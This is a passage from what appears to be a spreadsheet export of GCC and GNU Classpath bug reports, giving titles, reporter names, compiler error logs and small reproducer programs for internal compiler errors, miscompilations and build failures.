/home/angelo/archivio/aziende/sysam/buildall/m68k/gcc/./gcc/xgcc -B/home/angelo/archivio/aziende/sysam/buildall/m68k/gcc/./gcc/ -B/home/angelo/archivio/aziende/sysam/output/m68k-linux/bin/ -B/home/angelo/archivio/aziende/sysam/output/m68k-linux/lib/ -isystem /home/angelo/archivio/aziende/sysam/output/m68k-linux/include -isystem /home/angelo/archivio/aziende/sysam/output/m68k-linux/sys-include    -g -O2 -mcpu=54455 -Wa-mno-mac -O2  -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -Dinhibit_libc  -fPIC -I. -I. -I../../.././gcc -I/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc -I/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/. -I/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/../gcc -I/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/../include  -DHAVE_CC_TLS  -o linux-atomic.o -MT linux-atomic.o -MD -MP -MF linux-atomic.dep  -c /home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/config/m68k/linux-atomic.c -fvisibility=hidden -DHIDE_EXPORTS
/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/config/m68k/linux-atomic.c: In function '__sync_lock_test_and_set_4':
/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/config/m68k/linux-atomic.c:207:15: warning: left-hand operand of comma expression has no effect [-Wunused-value]
 #define COMMA 
               ^
/home/angelo/archivio/aziende/sysam/buildall/gcc-5.2.0/libgcc/config/m68k/linux-atomic.c:80:31: note: in definition of macro 'WORD_SYNC_OP'
       newval = PFX_OP (oldval INF_OP val)    \
Compiling on x86_64 os
$ gcc --version
gcc (Debian 5.2.1-21) 5.2.1 20151003
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
I attach configure and build logs.
Regards</t>
  </si>
  <si>
    <t>angelo70</t>
  </si>
  <si>
    <t>GCC-9799</t>
  </si>
  <si>
    <t>mismatching structure initializer with nested flexible array member segfaults</t>
  </si>
  <si>
    <t>Error message is...
  gcc_seg_fault.c:14: internal error: Segmentation fault
  Please submit a full bug report...
The following illegal code caused a segfault instead of being flagged as an illegal structure initializer.  Of course I stripped this down and changed the data and identifier names from my original code :).
There are actually two errors in my code which I suppose aligned to trigger the segfault.
Here is the code...
// gcc_seg_fault.c
typedef struct {
    int aaa
} s1_t
typedef struct {
    int bbb
    s1_t s1_array[]  // &lt;-- oops array has no size
} s2_t
static s2_t s2_array[]= {
    { 1 4} // &lt;-- 4 should really be inside { }
    { 2 5}
    { 3 6}
}
The following code does work...
// gcc_ok1.c
typedef struct {
    int aaa
} s1_t
typedef struct {
    int bbb
    s1_t s1_array[] 
} s2_t
static s2_t s2_array[]= {
    { 1 {4}}
    { 2 {5}}
    { 3 {6}}
}
and this works also...
// gcc_ok2.c
typedef struct {
    int aaa
} s1_t
typedef struct {
    int bbb
    s1_t s1_array[2]
} s2_t
static s2_t s2_array[]= {
    { 1 4}  
    { 2 5}  
    { 3 6}  
}
Release:
3.1
Environment:
linux 2.4
How-To-Repeat:
gcc -c gcc_seg_fault.c</t>
  </si>
  <si>
    <t>corey.minter</t>
  </si>
  <si>
    <t>GCC-28237</t>
  </si>
  <si>
    <t>print call()</t>
  </si>
  <si>
    <t>recursive function causes ICE
--------------
program r
implicit none
integer :: i=5
print fact(i)
stop
end
recursive function fact(n) result(nfact)
implicit none
integer intent(in) :: n
integer :: nfact
if (n&gt;0) then
  nfact = n * fact(n-1)
else
  nfact = 1
end if
end function fact
end
--------------------
gfortran -vUsing built-in specs.
Target: i586-pc-linux-gnu
Configured with: /tmp/gcc-4.0.3/configure --prefix=/usr --enable-shared --enable-threads=posix --enable-__cxa_atexit --with-gnu-as --with-gnu-ld --verbose --enable-languages=cc++f95 --disable-nls --disable-rpath --build=i586-pc-linux-gnu --target=i586-pc-linux-gnu --host=i586-pc-linux-gnu
Thread model: posix
gcc version 4.0.3
--------------------
even if the code is invalid it should not result in an ICE</t>
  </si>
  <si>
    <t>buraphalinuxserver</t>
  </si>
  <si>
    <t>GCC-17444</t>
  </si>
  <si>
    <t>lots of gcov failures with --enable-mapped-location</t>
  </si>
  <si>
    <t>I get lots of new failures in gcc.misc-tests/gcov.exp
if I configure with --enable-mapped-location.
Running /home/bothner/GNU/gcc.head/gcc/testsuite/gcc.misc-tests/gcov.exp ...
FAIL: 14:is -:should be 11
FAIL: 15:is -:should be 10
FAIL: 17:is -:should be 1
FAIL: gcc.misc-tests/gcov-1.c gcov: 3 failures in line counts 0 in branch
percentages 0 in return percentages
FAIL: 10:is -:should be 11
FAIL: gcc.misc-tests/gcov-10.c gcov: 1 failures in line counts 0 in branch
percentages 0 in return percentages
FAIL: 10:is -:should be 11
FAIL: gcc.misc-tests/gcov-10b.c gcov: 1 failures in line counts 0 in branch
percentages 0 in return percentages
FAIL: 11:is -:should be 10
FAIL: 18:is -:should be 11
FAIL: gcc.misc-tests/gcov-11.c gcov: 2 failures in line counts 0 in branch
percentages 0 in return percentages
FAIL: 14:is -:should be 11
FAIL: 15:is -:should be 10
FAIL: 17:is -:should be 1
... etc ...
Could someone please look into this?  Possibily related is
that profile.c failed to compile.  I'll attach my patch for
the latter which may well be wrong.</t>
  </si>
  <si>
    <t>GCC-31698</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in compare_name_with_value at tree-vrp.c:3272</t>
  </si>
  <si>
    <t>beachboys++ /tmp&gt; g++ -O2 mytestcase.i 
mytestcase.i: In member function â€˜void D::Do(B* C*)â€™:
mytestcase.i:36: internal compiler error: in compare_name_with_value at tree-vrp.c:3272
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
Preprocessed source stored into /tmp/ccwTAH7q.out file please attach this to your bugreport.
Exit 1
beachboys++ /tmp&gt; g++ -O0 mytestcase.i
/usr/lib/gcc/x86_64-linux-gnu/4.1.2/../../../../lib64/crt1.o: In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'
collect2: ld returned 1 exit status
Exit 1</t>
  </si>
  <si>
    <t>thimo.neubauer</t>
  </si>
  <si>
    <t>GCC-69760</t>
  </si>
  <si>
    <t>[4.9 Regression] Wrong 64-bit memory address caused by an unneeded overflowing 32-bit integer multiplication on x86_64 under -O2 and -O3 code optimization</t>
  </si>
  <si>
    <t>This simplest code test_func.c:
$ cat test_func.c
void test_func (double *a int L int m int n int N)
{
  int    i k
  for (i = 0 i &lt; N i++) {
    k = i - m
    if ((k &gt;= 0) &amp;&amp; (k &lt; n)) {
      a[L*k] = 0.0
    }
  }
  return
}
when compiled on x86_64 by GCC versions from at least 4.8.1 up to 5.3.0
is working right with -O0 or -O1 optimizations
but fails with -O2 or -O3 as can be seen by calling it
from this main function test_main.c:
$ cat test_main.c
#include 
void test_func (double *a int L int m int n int N)
int main ()
{
  double *a
  int    L m n N
  L = 10000000
  n = 4
  N = 100*n
  a = (double *) malloc (sizeof (double)*L*n)
  for (m = 0 m &lt; N m += n) {
    test_func (a L m n N)
  }
  free (a)
  return 0
}
$ for n in 0 1 2 3  do gcc-5.3.0 -S -O$n test_func.c -o test_func.O$n.s  wc test_func.O$n.s  gcc -O0 test_func.O$n.s test_main.c -o test.x  ./test.x  done
 51 119 881 test_func.O0.s
 35  79 551 test_func.O1.s
 45  94 696 test_func.O2.s
Segmentation fault
 45  94 696 test_func.O3.s
Segmentation fault
An even more _amazing_ thing is seen when printf is added:
$ cat test_func_print.c 
#include 
void test_func (double *a int L int m int n int N)
{
  int    i k
  for (i = 0 i &lt; N i++) {
    k = i - m
    if ((k &gt;= 0) &amp;&amp; (k &lt; n)) {
      printf (k=%d a=%p a+L*k=%p\n k a a + L*k)
      a[L*k] = 0.0
    }
  }
  return
}
$ gcc-5.3.0 -O2 test_func_print.c test_main.c -o test.x  ./test.x
k=0 a=0x7f66ddc42010 a+L*k=0x7f66ddc42010
...
k=0 a=0x7f66ddc42010 a+L*k=0x7f6eddc42010
Segmentation fault
the corrupted pointer being 0x800000000 higher than it should!
(Should anyone say that this innocent C code is wrong?)
It can be understood by looking into the assembly file
(with comments added by us):
$ cat test_func.O2.S 
        .file   test_func.c
        .section        .text.unlikelyax@progbits
.LCOLDB1:
        .text
.LHOTB1:
        .p2align 415
        .globl  test_func
        .type   test_func @function
test_func:
.LFB0:
        .cfi_startproc
        testl   %r8d %r8d
        jle     .L1             # if (N &lt;= 0) return
        movl    %edx %eax      # %eax = m
        movslq  %esi %r9       # %r9 = (long) L
        subl    %edx %r8d      # %r8d = N - m
        negl    %eax            # %eax = k = -m
        salq    $3 %r9         # %r9 = 8*((long) L)
        imull   %eax %esi      # %esi = L*(-m)
        movslq  %esi %rsi      # %rsi = (long) (L*(-m))
        leaq    (%rdi%rsi8) %rsi     # %rsi = ak = a + L*(-m)
        .p2align 410
        .p2align 3
.L4:
        testl   %eax %eax
        js      .L3
        cmpl    %eax %ecx
        jle     .L3
        movq    $0 (%rsi)      # if ((k &gt;= 0) &amp;&amp; (k &lt; n)) *ak = 0.0
.L3:
        addl    $1 %eax        # %eax = k++
        addq    %r9 %rsi       # %rsi = ak += L
        cmpl    %r8d %eax
        jne     .L4             # if (k != N - m) goto L4
.L1:
        rep ret
        .cfi_endproc
.LFE0:
        .size   test_func .-test_func
        .section        .text.unlikely
.LCOLDE1:
        .text
.LHOTE1:
        .ident  GCC: (GNU) 5.3.0
        .section        .note.GNU-stack@progbits
The problem is that the optimizer rewrites the code as if it were:
void test_func (double *a int L int m int n int N)
{
  double *ak
  int    k
  if (N &lt;= 0) {
    return
  }
  ak = a + L*(-m)
  for (k = -m k &lt; N - m k++) {
    if ((k &gt;= 0) &amp;&amp; (k &lt; n)) {
      *ak = 0.0
    }
    ak += L
  }
  return
}
and because L*(-m) is computed in 32-bit precision
in which it does not fit the pointer double *ak
fails to reference a[0] after being m times incremented by L.
The problem would be solved by teaching the compiler
to use more bits when precomputing pointers for the optimized loops
in this example:
...
ak = a + ((long) L)*(-m)
...
or something like this
test_func:
.LFB0:
        .cfi_startproc
        testl   %r8d %r8d
        jle     .L1             # if (N &lt;= 0) return
        movslq  %edx %rax      #|%rax = (long) m
        movslq  %esi %r9       # %r9 = (long) L
        subl    %edx %r8d      # %r8d = N - m
        negq    %rax            #|%rax = k = -m
        salq    $3 %r9         # %r9 = 8*((long) L)
        movslq  %esi %rsi      #|%rsi = (long) L
        imulq   %rax %rsi      # %rsi = ((long) L)*(-m)
#       movslq  %esi %rsi      #-
        leaq    (%rdi%rsi8) %rsi     # %rsi = ak = a + ((long) L)*(-m)
        .p2align 410
        .p2align 3
.L4:
        testl   %eax %eax
        js      .L3
        cmpl    %eax %ecx
        jle     .L3
        movq    $0 (%rsi)      # if ((k &gt;= 0) &amp;&amp; (k &lt; n)) *ak = 0.0
.L3:
        addl    $1 %eax        # %eax = k++
        addq    %r9 %rsi       # %rsi = ak += L
        cmpl    %r8d %eax
        jne     .L4             # if (k != N - m) goto L4
.L1:
        rep ret
Many thanks for your kind attention.</t>
  </si>
  <si>
    <t>dimitri_laikov</t>
  </si>
  <si>
    <t>CLASSPATH-21660</t>
  </si>
  <si>
    <t>FileDialog.SAVE broken</t>
  </si>
  <si>
    <t>FileDialog does not allow saving files.
A FileDialog created with FileDialog.SAVE mode still comes up
in FileDialog.LOAD (open file) mode. The wrong title is no
real problem but without a textfield there is no way to select
a new (non existing) filename...
testcase and screenshot attached.
gij (GNU libgcj) version 4.1.0 20050424 (experimental)</t>
  </si>
  <si>
    <t>GCC-55387</t>
  </si>
  <si>
    <t>[4.8 Regression] Build problem: malloc error in genautomata</t>
  </si>
  <si>
    <t>When attempting to build the latest SVN gcc (4.8.0 rev. 193610) I get the following error:
build/genautomata ../.././gcc/config/i386/i386.md \
	  insn-conditions.md &gt; tmp-automata.c
genautomata(1500) malloc: *** error for object 0xc1e8b60252d64: pointer being freed was not allocated
*** set a breakpoint in malloc_error_break to debug
/bin/sh: line 1:  1500 Abort trap: 6           build/genautomata ../.././gcc/config/i386/i386.md insn-conditions.md &gt; tmp-automata.c
make[3]: *** [s-automata] Error 134
make[2]: *** [all-stage1-gcc] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2
This is on OS X 10.7.5 with the following config options:
./configure CC=gcc -D_FORTIFY_SOURCE=0 \
  --build=x86_64-apple-darwin11.4.2 \
  --prefix=/Applications/madsdk \
  --with-gmp=/Applications/madsdk \
  --with-mpfr=/Applications/madsdk \
  --with-mpc=/Applications/madsdk \
  --enable-languages=cc++fortran --disable-multilib</t>
  </si>
  <si>
    <t>GCC-40549</t>
  </si>
  <si>
    <t>Building libgfortran as a DLL</t>
  </si>
  <si>
    <t>MinGW (http://www.mingw.org/) now has an official 4.4.0 release - and thus finally a 4.x release. If one looks at the release
http://sourceforge.net/project/showfiles.php?group_id=2435&amp;package_id=241304
one finds a tar ball (gcc-4.4.0-mingw32-src-2.tar.gz) with patches.
For Fortran I found the following we should consider applying them - after understanding whether the changes make sense.
There are two changes:
a) -no-undefined
b) LIBOBJDIR=
 * * *
a) -no-undefined option
For MinGW the -no-undefined is set cf.
http://www.gnu.org/software/libtool/manual/html_node/libtool-script-contents.html#index-allow_005fundefined_005fflag-358
and more readable:
  http://lists.gnupg.org/pipermail/gcrypt-devel/2006-June/000966.html
Doing a grep shows that it is already set for libgomp/Makefile.in and libssp/Makefile.in.
MinGW sets is additionally for libgfortran libffi libjava libobjc libstdc++v3/{lib*/}.
b) LIBOBJDIR=
See: http://www.gnu.org/software/autoconf/manual/html_node/AC_005fLIBOBJ-vs-LIBOBJS.html. I think this part of the patch is a side effect of using autoconf 1.10+ instead of autoconf 1.9.6 which is suggested for GCC development.
Note: An analogous patch was accepted for libgomp by a build-machinery maintainer
http://gcc.gnu.org/ml/gcc-patches/2008-08/msg01509.html
---------------------------------------------------------------------------
Index: libgfortran/Makefile.am
===================================================================
--- libgfortran/Makefile.am     (revision 145042)
+++ libgfortran/Makefile.am     (working copy)
@@ -177 +179 @@ LTLDFLAGS = $(shell $(SHELL) $(top_srcdi
 toolexeclib_LTLIBRARIES = libgfortran.la
 libgfortran_la_LINK = $(LINK)
-libgfortran_la_LDFLAGS = -version-info `grep -v '^\#' $(srcdir)/libtool-version` $(LTLDFLAGS) -lm $(extra_ldflags_libgfortran) $(version_arg)
+libgfortran_la_LDFLAGS = -version-info `grep -v '^\#' $(srcdir)/libtool-version` \
+                        $(LTLDFLAGS) -lm $(extra_ldflags_libgfortran) \
+                        $(version_arg) -no-undefined
 myexeclib_LTLIBRARIES = libgfortranbegin.la
 myexeclibdir = $(libdir)/gcc/$(target_alias)/$(gcc_version)$(MULTISUBDIR)
Index: libgfortran/Makefile.in
===================================================================
--- libgfortran/Makefile.in     (revision 146010)
+++ libgfortran/Makefile.in     (working copy)
@@ -376 +377 @@ POST_UNINSTALL = :
 build_triplet = @build@
 host_triplet = @host@
 target_triplet = @target@
+LIBOBJDIR =
 # dummy sources for libtool
 @onestep_TRUE@am__append_1 = libgfortran_c.c libgfortran_f.f90
@@ -9537 +95410 @@ gcc_version := $(shell cat $(top_srcdir)
 LTLDFLAGS = $(shell $(SHELL) $(top_srcdir)/../libtool-ldflags $(LDFLAGS))
 toolexeclib_LTLIBRARIES = libgfortran.la
 libgfortran_la_LINK = $(LINK)
-libgfortran_la_LDFLAGS = -version-info `grep -v '^\#' $(srcdir)/libtool-version` $(LTLDFLAGS) -lm $(extra_ldflags_libgfortran) $(version_arg)
+libgfortran_la_LDFLAGS = -version-info `grep -v '^\#' $(srcdir)/libtool-version` \
+                        $(LTLDFLAGS) -lm $(extra_ldflags_libgfortran) \
+                        $(version_arg) -no-undefined
+
 myexeclib_LTLIBRARIES = libgfortranbegin.la
 myexeclibdir = $(libdir)/gcc/$(target_alias)/$(gcc_version)$(MULTISUBDIR)
 libgfortranbegin_la_SOURCES = fmain.c</t>
  </si>
  <si>
    <t>GCC-17119</t>
  </si>
  <si>
    <t>[m32r] ICE at switch case 0x8000</t>
  </si>
  <si>
    <t>--- ice_cbit.c ---
void
_mesa_DrawPixels( int width int height
                  unsigned int format  unsigned int type
                  const void *pixels )
{
  switch (format) {
  case 0x1900:
    func1()
    break
  case 0x1907:
  case 0x80E0:
  case 0x1908:
  case 0x80E1:
  case 0x8000:
    func2()
    break
  }
}
m32r-elf-gcc -c -O0 ice_cbit.c
ice_cbit.c: In function `_mesa_DrawPixels':
ice_cbit.c:18: error: unrecognizable insn:
(insn 45 62 46 5 ice_cbit.c:8 (set (reg:CC 17 cbit)
        (ltu:CC (reg:SI 25 [ format ])
            (const_int 32768 [0x8000]))) -1 (nil)
    (nil))
ice_cbit.c:18: internal compiler error: in extract_insn at recog.c:2083
Test Version:
Reading specs from /usr/local/m32r-elf/lib/gcc/m32r-elf/3.4.2/specs
Configured with: /home3/FSF/org_src/gcc-3.4/gcc/configure --target=m32r-elf
--prefix=/usr/local/m32r-elf --srcdir=/home3/FSF/org_src/gcc-3.4/gcc
--enable-languages=cc++ --with-newlib
Thread model: single
gcc version 3.4.2 20040819 (prerelease)</t>
  </si>
  <si>
    <t>GCC-70009</t>
  </si>
  <si>
    <t>test case libgomp.oacc-c-c++-common/vprop.c fails starting with its introduction in r233607</t>
  </si>
  <si>
    <t>FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/vprop.c -DACC_DEVICE_TYPE_host=1 -DACC_MEM_SHARED=1 (test for excess errors)
FAIL: libgomp.oacc-c++/../libgomp.oacc-c-c++-common/vprop.c -DACC_DEVICE_TYPE_host=1 -DACC_MEM_SHARED=1 execution test
Testing libgomp.oacc-c-c++-common/vprop.c
doing compile
pid is 95346 -95346
close result is 95346 exp8 0 1
output is /home/seurer/gcc/gcc-test2/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/vprop.c: In function 'test_char':
/home/seurer/gcc/gcc-test2/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/vprop.c:11:12: error: invalid controlling predicate
/home/seurer/gcc/gcc-test2/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/vprop.c:24:1: note: in expansion of macro 'test'
 status 1
compiler exited with status 1
FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/vprop.c -DACC_DEVICE_TYPE_host=1 -DACC_MEM_SHARED=1 (test for excess errors)
From my testing this fails on powerpc (both BE and LE) but not x86.</t>
  </si>
  <si>
    <t>GCC-35080</t>
  </si>
  <si>
    <t>__thread generators a.out that creates segmentation fault</t>
  </si>
  <si>
    <t>We were using g++ (GCC) 3.4.6 20060404 (Red Hat 3.4.6.9) on Linux 2.6.24.14 SMP X86_64 GNU/Linux 4-core Intel @2.66GHz.
We executed: g++ -O0 test.cc
             ./a.out
./a.out causes segmentation fault.
The file test.cc folows below:
__thread int testarray[2]
int main()
{
  int i = 2
  testarray[i-1] = 1
  int p
  p = testarray[i-1]
  p = p + 1
  printf(%d\n p)
  return 0
}</t>
  </si>
  <si>
    <t>xindong</t>
  </si>
  <si>
    <t>GCC-28508</t>
  </si>
  <si>
    <t>Assembler Error: operand out of range (145 not between -128 and 127) form m32r-target</t>
  </si>
  <si>
    <t>e have often gotten the following assembler error with -g option
since m32r-linux-gnu-gcc-4.0 released.
/tmp/cch1oLgA.s: Assembler messages:
/tmp/cch1oLgA.s:2591: Error: operand out of range (145 not between -128 and 127)/tmp/cch1oLgA.s:3358: Error: operand out of range (145 not between -128 and 127)/tmp/cch1oLgA.s:5195: Error: operand out of range (-130 not between -128 and 127)
We have been using DWARF2 since gcc-4.0.
It creates many local label symbols and makes pnop codes for code aligments.
We have no idia to avoid this error on compiling.
So we propose to change the range for using short bransh format code.</t>
  </si>
  <si>
    <t>GCC-3268</t>
  </si>
  <si>
    <t>Nested include in GCC 3.0 due to small mistake in tm.h file</t>
  </si>
  <si>
    <t>When the new GCC
Release:
New GCC 3.0
Environment:
Cygwin-i686</t>
  </si>
  <si>
    <t>j.vandenberg</t>
  </si>
  <si>
    <t>GCC-37792</t>
  </si>
  <si>
    <t>ICE in gfc_conv_array_initializer works with -fno-range-check</t>
  </si>
  <si>
    <t>The following program gives an ICE:
internal compiler error: in gfc_conv_array_initializer at fortran/trans-array.c:3976
However it works when one uses -fno-range-check
See: http://gcc.gnu.org/ml/fortran/2008-10/msg00078.html</t>
  </si>
  <si>
    <t>CLASSPATH-27660</t>
  </si>
  <si>
    <t>mouse click offset regression</t>
  </si>
  <si>
    <t>Run the applet viewer on this chess applet:
 ~/workspace/classpath/install/bin/cacao gnu.classpath.tools.appletviewer.Main http://www.chessgames.com/perl/chessgame?gid=1409922
Now try clicking on black's 23rd move.  Notice that the wrong move
is selected.
This is a regression because it worked in the recent past.</t>
  </si>
  <si>
    <t>GCC-1485</t>
  </si>
  <si>
    <t>Internal compiler error in print_rtl_and_abort</t>
  </si>
  <si>
    <t>During compiling of openssl with gcc version 2.97 20001218 I encountered the following error:
make[2]: Entering directory `/camaro/u/ssh/openssl-0.9.6/ssl'
gcc -I../crypto -I../include -fPIC -DTHREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN
_H -mcpu=ultrasparc -O3 -fomit-frame-pointer -Wall -DB_ENDIAN -DBN_DIV2W -DULTRASP
ARC -DMD5_ASM   -c ssl_ciph.c -o ssl_ciph.o
ssl_ciph.c: In function `SSL_CIPHER_description':
ssl_ciph.c:987: Internal compiler error in print_rtl_and_abort at flow.c:6343
Please submit a full bug report.
 See  for instructions.
make[2]: *** [ssl_ciph.o] Error 1
make[2]: Leaving directory `/camaro/u/ssh/openssl-0.9.6/ssl'
make[1]: *** [all] Error 1
make[1]: Leaving directory `/camaro/u/ssh/openssl-0.9.6'
make: *** [top] Error 2
bash-2.02#
Release:
gcc version 2.97 20001218
Environment:
gcc version 2.97 20001218
Solaris 2.6
How-To-Repeat:
1) Using a bootstrapped gcc version 2.97 20001218
2) cd openssl-0.9.6
3) ./configure --prefix=/usr/local
4) make</t>
  </si>
  <si>
    <t>tmuller</t>
  </si>
  <si>
    <t>GCC-2123</t>
  </si>
  <si>
    <t>Array initializer</t>
  </si>
  <si>
    <t>c++ compiles without any message but the result is
&gt; run
0 0 0 0 0
As far as I known the code is wrong
(no initializer allowed).
Release:
gcc version 2.95.2 19991024 (release) gcc version 2.97 20010205 (experimental)
Environment:
Linux 2.2 Solaris 2.6 2.8
How-To-Repeat:
#include 
int main()
{
  int* x=new int[5](1) // allowed by ANSI ???
  for (unsigned int k=0k&lt;5k++) {
    std::cout &lt;&lt;   &lt;&lt; x[k]
  }
  std::cout &lt;&lt; std::endl
}</t>
  </si>
  <si>
    <t>schreib</t>
  </si>
  <si>
    <t>GCC-37454</t>
  </si>
  <si>
    <t>gcc: unrecognized option '-rdynamic'</t>
  </si>
  <si>
    <t>gcc doesn't know -rdynamic option
From gcc-4.3.1 man page
     -rdynamic
         Pass the flag -export-dynamic to the ELF linker on
         targets that support it. This instructs the linker to
         add all symbols not only used ones to the dynamic
         symbol table. This option is needed for some uses of
         dlopen or to allow obtaining backtraces from within a
         program.
From ld 2.18 man page
     --export-dynamic
         When creating a dynamically linked executable  add  all
         symbols to the dynamic symbol table.  The dynamic symbol
         table is the set  of  symbols  which  are  visible  from
         dynamic objects at run time.
So I believe that gcc should know -rdynamic
My fix was to add the following line to the #define LINK_SPEC in the file gcc-4.3.1/gcc/config/sol2.h at line 145:
    %{rdynamic:--export-dynamic} \
OS and tools
SunOS solaris 5.11 snv_95 i86pc i386 i86pc Solaris
gcc (GCC) 4.3.1
ld (GNU Binutils) 2.18</t>
  </si>
  <si>
    <t>GCC-39896</t>
  </si>
  <si>
    <t>ICE with -fwhole-file</t>
  </si>
  <si>
    <t>The code below (extracted from a large application) gives an ICE if compiled with -fwhole-file. 
$&gt; cat ice.for
      PROGRAM xxx
      implicit Real*8 (a-ho-z)
      PARAMETER   ( NU    = 512*101 + 10*101 + 2*512 )
      DIMENSION    AJ(2048)
      DIMENSION    AIS(512) ER1(512)
      DIMENSION    U(NU) U2(NU)
      CALL PTIC10(UU2ER1NR0NAJAIS)
 456  CONTINUE
      GO TO 456
      END
      SUBROUTINE PTIC10(AA1ERNMAJAIS)
      implicit real*8 (a-ho-z)
      DIMENSION ER(M)A(MN)A1(MN)AJ(M)AIS(M)
      END
$&gt; gfortran-svn -c -fwhole-file ice.for
f951: internal compiler error: Segmentation fault
$&gt; gfortran-svn -v
gcc version 4.5.0 20090424</t>
  </si>
  <si>
    <t>GCC-594</t>
  </si>
  <si>
    <t>cpp errs when one macro calls another</t>
  </si>
  <si>
    <t>In cpp the code
#define __T_TYPE float
#define __T_ADD __T_ADD_(__T_TYPE)
__T_ADD
gives
__T_ADD_(float )
and the code
#define __T_ADD_(name) name##_float
__T_ADD_(float )
gives
float_add
However the code
#define __T_TYPE float
#define __T_ADD_(name) name##_float
#define __T_ADD __T_ADD(__T_TYPE)
__T_ADD
gives
__T_TYPE_add
So if we write the output of a first macro explicitly 
it will work correctly otherwise cpp will err when one 
macro calls another.
Release:
2.8.1
Environment:
Linux &amp; Solaris
How-To-Repeat:
gcc test.c -E</t>
  </si>
  <si>
    <t>mcartoaj</t>
  </si>
  <si>
    <t>GCC-11279</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] DWARF-2 output mishandles large enums</t>
  </si>
  <si>
    <t>Given this line:
enum e {I J=(unsigned)0xffffffff} e = J
Compiled with -gdwarf-2 we get:
 : Abbrev Number: 3 (DW_TAG_enumerator)
     DW_AT_name        : I
     DW_AT_const_value : 0
 : Abbrev Number: 4 (DW_TAG_enumerator)
     DW_AT_name        : J
There is no DW_AT_const_value for J so GDB can not figure out
the value of J.</t>
  </si>
  <si>
    <t>GCC-32190</t>
  </si>
  <si>
    <t>wrong error recovery on parsing template arguments</t>
  </si>
  <si>
    <t>This code:
template class foo{ }
int main() {
    foo i
    foo j
    int k
    int l
    foo m
    return 0
    }
gets you:
~/ootbc/sim/sandbox$ g++ foo.cc
foo.cc: In function 'int main()':
foo.cc:8: error: template argument 1 is invalid
foo.cc:8: error: invalid type in declaration before '' token
~/ootbc/sim/sandbox$ fg
The real problem is a missing &gt; three lines earlier.</t>
  </si>
  <si>
    <t>GCC-37742</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in vectorizer with restrict pointer</t>
  </si>
  <si>
    <t>I don't know how to make a preprocessed sourcesorry!
$gcc --version
gcc (GCC) 4.4.0 20081005 (experimental)
$cd mpich2-1.1.0a1 mkdir build cd build
$../configure --prefix=/usr/local/mpich2 make
  CC              ../../../../src/mpi/coll/opsum.c
../../../../src/mpi/coll/opsum.c: In function 'MPIR_SUM':
../../../../src/mpi/coll/opsum.c:21: internal compiler error: in vectorizable_load at tree-vect-transform.c:6675
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [opsum.o] Error 1
make[3]: Leaving directory `/mnt/usr/fortran/packages/mpich2-1.1.0a1/build/src/mpi/coll'
make[2]: *** [all-redirect] Error 2
make[2]: Leaving directory `/mnt/usr/fortran/packages/mpich2-1.1.0a1/build/src/mpi'
make[1]: *** [all-redirect] Error 2
make[1]: Leaving directory `/mnt/usr/fortran/packages/mpich2-1.1.0a1/build/src'</t>
  </si>
  <si>
    <t>GCC-31453</t>
  </si>
  <si>
    <t>g++.old-deja/g++.mike/p4736b.C:41: ICE: in convert_memory_address at explow.c:319</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/mnt/gnu/gc
c/objdir/gcc/testsuite/g++/../../ /mnt/gnu/gcc/gcc/gcc/testsuite/g++.old-deja/g+
+.mike/p4736b.C  -nostdinc++ -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc
++-v3/include/hppa2.0w-hp-hpux11.11 -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/
libstdc++-v3/include -I/mnt/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/mnt/gnu/gcc/gc
c/libstdc++-v3/include/backward -I/mnt/gnu/gcc/gcc/libstdc++-v3/testsuite/util -
fmessage-length=0   -ansi -pedantic-errors -Wno-long-long    -L/mnt/gnu/gcc/objd
ir/hppa2.0w-hp-hpux11.11/./libstdc++-v3/src/.libs  -L/mnt/gnu/gcc/objdir/hppa2.0
w-hp-hpux11.11/./libstdc++-v3/src/.libs -L/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11
.11/./libiberty  -lm   -o ./p4736b.exe    (timeout = 300)
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.old-deja/g++.mike/p4736b.C: In function 'int
main()':
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.old-deja/g++.mike/p4736b.C:41: internal compi
ler error: in convert_memory_address at explow.c:319
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-40158</t>
  </si>
  <si>
    <t>Misleading error message for passing a scalar to an array</t>
  </si>
  <si>
    <t>The following program is rightly rejected. But the problem is not really that the ranks are different (as the example shows for i which is valid). The issue is that j is a scalar.  -- A user might also not be that familiar the concept that a rank-0 array is equivalent to a scalar.
gfortran shows:
  Error: Rank mismatch in argument 'i' at (1) (1 and 0)
other compiles have e.g.
